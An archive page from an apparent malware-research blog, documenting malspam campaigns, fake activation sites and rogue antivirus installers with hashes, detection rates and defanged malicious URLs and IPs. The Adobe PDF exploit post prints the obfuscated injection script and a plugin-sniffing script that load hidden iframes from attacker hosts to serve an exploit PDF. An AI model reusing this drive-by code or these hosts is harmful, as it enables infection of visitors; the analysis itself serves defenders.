MalSpam | Malware Database

Archive for the 'MalSpam' Category

Nov

Fake Activation and Mailing List Unsubscribe Websites

By mwdisector 0 Comments

Categories: MalSpam and Phishing

In the past few days I’ve seen many websites pop up pretending to be mailing list unsubscription sites. And per usual, these sites feature legit sounding names like antivirus-activation-code1.org or online-activation-code.info.

Example screenshot.

STAY AWAY from these because in reality they are being used to collect email addresses likely for future SPAM campaigns. I also suspect these domains are part of a current fake XP activation SPAM campaign.

Domains involved:

antivirus–activation–code1.org
antivirus–activation-code2.org
antivirus-activation–code1.org
antivirus-activation-code1.org
antivirus-activation-code2.org
antivirus-activation–code.info
antivirus–activation–code.info
new-activation-code.info
new–activation-code.info
online-activation-code.info
online–activation-code.info
online-activation–code.info
online–activation–code.info
pdf-activation-code.info
pdf–activation-code.info
pdf-activation–code.info

IPs associated with these:
66.79.162.82
67.209.140.130

antivirus-activation–code2.org
91.199.50.101

BE ADVISED: These sites may still be active, be careful!

–mwdisector

Sep

SpamNuker

By stingner 0 Comments

Categories: Database Update and MalSpam

Note: This site is distributing Rogue “Fake” Anti-Spam Malware product. Do not visit, pay, or download the software discussed below.

Site: hxxp://spamnuker.com/

File: OutlookSpamNukerInstaller.exe
VirusTotal: Result 14/36 (38.89%)

File size: 29280 bytes
MD5…: 463de2ba97b8effef4b72430de51553b
SHA1..: 1eb9f02c925ef27c5e6a1086cb0c6c798c208eaf
SHA256: 7700a3c6a95ed1bb2dfb21567818c7bce55a5d178b28cc9040c528d7045f72eb
SHA512: b52f87db3390ecd2cd5726c3833c07a224d9c718cc8d4a421faef5f66d3f3a26
25d1a92c7bf288f67e4fba9f1fd63c40fd05b76ea85b149d6019a6a17e428bce
PEiD..: -
TrID..: File type identification
Windows Screen Saver (39.4%)
Win32 Executable Generic (25.6%)
Win32 Dynamic Link Library (generic) (22.8%)
Generic Win/DOS Executable (6.0%)
DOS Executable Generic (6.0%)

Sep

Virus Response Lab 2009

By stingner 1 Comment

Categories: Advanced Antivirus, Database Update, MalSpam, Malicious Domains, Malware, Rogue Security Software, Rogue Software and Uncategorized

Note: This site is distributing Rogue “Fake” Anti-Malware product. Do not visit, pay, or download the software discussed below.

Site:

* hxxp://viruslabs2009.com/

File: virlab_install.exe
VirusTotal: Result: 9/36 (25%)
File size: 1579973 bytes
MD5…: 93fef280425ad6fb002430abb8cf216d
SHA1..: 766a414faa1e062c0ce40f1ede93a3d166902b6c
SHA256: 4346309f29aacf14cd0fc764ccac674572a498b7f80e1a4018265008cbf1ba4c
SHA512: 371d231b30c32756be1dbd5b50e26144d506abe895a6893fdcea866b8353e310
8548ded05366e25c2d968dffa506880e8729b7b8a6b4f4e06c3814d903eba37e
PEiD..: -
TrID..: File type identification
Win64 Executable Generic (59.6%)
Win32 Executable MS Visual C++ (generic) (26.2%)
Win32 Executable Generic (5.9%)
Win32 Dynamic Link Library (generic) (5.2%)
Generic Win/DOS Executable (1.3%)

MDB: /stingner-malware/

Removal:

Remove this threat with MalwareBytes!

Sep

Malspam: Notices from IRS (taxform_for_print.scr)

By djpnuemo 0 Comments

Categories: E-mail, MalSpam, Malicious Links, Malware, Malware Distribution and Social Engineering

Here is a piece of malspam we received that poses to be from the IRS telling you that you are due for a refund. The one we got was from taxinform32@taxreducers.com. Simply follow the steps below and the money is yours! (Proceed at your own risk. File available in /pnuemo-malware/.)

Get Your Refund $1927.10 in Just 3 Easy Steps:
1. Print and fill a short tax interview (click to download)
2. Send it online
3. Receive your tax refund

The link included takes you to the following address and file: hxxp://freepromo.cn/documents/taxform_for_print.scr

taxform_for_print.scr
Result: 7/36 (19.45%)
MD5: a705a1df1fc36f696f0eb0fea72870d3
VirusTotal
ThreatExpert Analysis

Aug

Adobe Acrobat Reader PDF Exploit (gnu.pdf & us.pdf) (UPDATED)

By djpnuemo 0 Comments

Categories: Antivirus 2008, Database Update, IFRAME, MalSpam, Malicious Links, Malware, Rogue Software and Vulnerabilities

This morning we’ve found a website that automatically loads an infected pdf file.

When the user is directed to the infected site, there is a hidden iframe that loads the pdf file. Here’s what happens…

Links still live, proceed at your own risk.

User visits hxxp://120.50.46.90/~admin/tps/index.php and the following obfuscated code is included

<script language=”javascript”>document.write(unescape(’%3C%69%66%72
%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%36%39%2E
%34%36%2E%32%37%2E%34%31%2F%61%66%78%76%2F%74%70%76%2F%69
%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68
%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%76%69%73%69
%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74
%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%22%3E%3C%2F%69%66
%72%61%6D%65%3E’));</script>

when deobfuscated…

<iframe src=”http://69.46.27.41/afxv/tpv/index.php” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

We can see the hidden iframe above and the page includes the following code…

<script>
ppdf=0;
i=0;
for(;navigator.plugins[i];i++)
{
re=/.d.{2}e.A.{2}o…..l..-.+?([0-9]+.[0-9]+)/;
if(res=re.exec(navigator.plugins[i].description))
{
ppdf=res[1];
}
var re=/.h.{5}v.+?s.\s([0-9])\S([0-9]).+?([0-9]{1,5})/;
var res;
if(res=re.exec(navigator.plugins[i].description))
{
flash=res[1]+’.'+res[2]+’.'+res[3];
}
}
ppdfenable=0;
if(ppdf!=0)
{
ppdfenable=0;
ppdf=ppdf.replace(/\D/g,”");
if(ppdf[0]==7 && ppdf[1]<1)ppdfenable=1;
if(ppdf[0]<7)ppdfenable=1;if(ppdfenable)
{
document.write(’<iframe width=1 height=1 src=”hxxp://69.46.27.41/afxv/tpv/gnu.pdf”></iframe>’);
}
}
</script>

Thus leading us to the pdf in question located at hxxp://69.46.27.41/afxv/tpv/gnu.pdf. Here is additional information regarding this file. This is also available in /pnuemo-malware/.

gnu.pdf
Result: 6/35 (17.15%)
MD5: 213d20a0523b6ea6c93d4348a509c34c
VirusTotal

Update your software!

UPDATED 9/1 12p PST

us.pdf
Result: 10/36 (27.78%)
MD5: 8175212481f069a6dd54de9cbd044039
VirusTotal
hxxp://174.133.121.165/us.pdf
hxxp://88.85.95.134/us.pdf

Aug

YouTube Message Malspam

By djpnuemo 0 Comments

Categories: E-mail, MalSpam, Malicious Links and Malware

I received this in my inbox today from YouTube that someone had sent me a message. The URL in the message takes the user through two redirects and then prompts the user to download a file. This files is malware and currently has a low detection rate. Here is the information I’ve gathered. All of the URL’s below are still live so proceed at your own risk.

hxxp://zz.gd/1d7d6a
-> hxxp://sghghdfgh.actionpooses.com/dfhgfhgfh
–> hxxp://actionpooses.com/livenow/live-now.htm
—> hxxp://212.179.35.9/Free-Girls-Cams-Viewer.exe

Free-Girls-Cams-Viewer.exe
Result: 6/36 (16.67%)
MD5: 716adbf47c6fffbd77604be9e9dd7043
VirusTotal
ThreatExpert Analysis

Aug

“Weekly top news” (new)

By quine 3 Comments

Categories: Antivirus 2008, MalSpam and Malware

In the same vein as the recent fake CNN and MSNBC malspam campaigns, a new one is floating around with the subject line of “Weekly top news”, with the sender’s name “Top News Agency”:

The content of the e-mail purports to link to a number of “breaking” news items and “shocking” videos:

The infected sites look rather plain (no images from real news sites) with another false video embed and “ActiveX Object Error”:

Funny enough, clicking on the “Close this page” button at the top attempts to redirect to hxxp://79.135.167.18/antivirus, but due to a bit of a coding error on the behalf of the bad guys/gals, it looks like they only appended that URL to the existing one, e.g. hxxp://[infected site]/URL=hxxp://79.135.167.18/antivirus…yielding a 404:

Now, when attempting to navigate away from the page (or reload, too, of course), the user is presented with another warning dialog, stating that they haven’t finished their virus scan! GASP!

The dropper looks to be very similar to the ones we’ve already seen in the fake CNN and MSNBC campaigns, so nothing terribly new here. Two different filenames, scaner.exe [sic] and install.exe. Same tactic to get the user to download the dropper, too (simply direct them to it). Judging by what we’ve seen so far, this one’s going to download “Antivirus XP 2008″ again, so nothing new there, either.

SHA256(install.exe)= c5c3c45d488028bb5978cdababde1e90a18ea4ba994ad1eb6205399b04a4faca
SHA256(scaner.exe)= c5c3c45d488028bb5978cdababde1e90a18ea4ba994ad1eb6205399b04a4faca

Aug

CNN & MSNBC Attack - Where is it all coming from?

By lithium 1 Comment

Categories: CNN, MalSpam, Malicious Domains, Malicious Links, Thoughts and Uncategorized

My e-mail inbox has been flooded since breaking the CNN malspam story. Everyone wants to know where this attack is coming from and how it’s releasing itself into the wild so quickly. I’m sorry to say that I do not have the answer yet… but I do have a hypothesis.

I believe the attack is exploited 100% through hacked/infected computers. We know that the e-mails are being distributed by infected computers as we can tell from the e-mail headers, most of the e-mails come from private ADSL or cable lines. One question remains… how are the websites getting owned? Take a second to consider the following possibility…

I own domain.com and I don’t know a whole lot about HTML. I want a flashy website so I go out and buy “Build Your Own Website Software 1.0″. This type of software has several useful features such as a WYSIWYG editor, scripts, images, templates, and automatic FTP upload features.

If my machine is infected with malware it will most definitely search for FTP credentials. If the hackers spent a long enough time harvesting the FTP credentials all they needed to do is write software to upload their malicious pages to each site and then direct their botnet to start spamming the links at the same time.

Let’s look at one of the e-mails we received:
Header:

Received: from *.adsl.alicedsl.de (*.adsl.alicedsl.de [78.4*.15*.28*])

This header shows us that the mail was sent from a private ADSL line on the de TLD.

Body:

Girl trains monkey to give tongue service video hxxp://download.german-railroads.eu/start.html

The body of the e-mail contains a link to a German railroads site. Is this a coincidence?

I feel that my hypothesis is fairly obvious but I have not seen much speculation about the attack vector and I would like some input from our readers. What do you think?

If anyone reading this post has had their website compromised by this attack, please contact me at lithium@malwaredatabase.net as I would like to perform a post-mortem analysis to identify the attack vector.

Aug

“msnbc.com - BREAKING NEWS” (update)

By quine 0 Comments

Categories: Antivirus 2008, MalSpam and Malware

The content of the infected sites has changed, now accurately imitating MSNBC sites:

Additionally, the downloader, adobe_flash.exe, appears to be slightly different, as a new checksum is represented:

SHA256(adobe_flash.exe)= 2fb8a4ecb561475b52883b535ce9810e6021ebe666e16e89cbbc86018d153547

Analysis to come.

Aug

“msnbc.com - BREAKING NEWS” (new)

By quine 0 Comments

Categories: Antivirus 2008, CNN, MalSpam and Malware

It looks like a campaign has begun, similar to the fake CNN alerts, using MSNBC “Breaking News” notification e-mails:

Updated Subject Lines:

msnbc.com - BREAKING NEWS: Time Warner sells AOL
msnbc.com - BREAKING NEWS: How to save money on gas
msnbc.com - BREAKING NEWS: Americans loves to sue people
msnbc.com - BREAKING NEWS: Millions of credic card numbers stolen from bank database, find out if you are affected
msnbc.com -BREAKING NEWS: Mary-Kate Olsen implicated in Heath Ledger’s death

The hyperlink purporting to be hxxp://breakingnews.msnbc.com actually points to the malicious domain, wherein is hosted what appears to be the same content as the fake CNN campaign:

Just like before, the content of the infected site/page is replete with plenty of escaped text waiting to be decoded by a document.write(unescape…) call down near the bottom. The downloader, adobe_flash.exe, appears to be the same one used in the CNN-oriented campaign. Looks like they’re not changing much.

SHA256(adobe_flash.exe)= a629c6ea28327a467e666a2a7d5a5ccc3194858b2217f608431b98dff268c2d9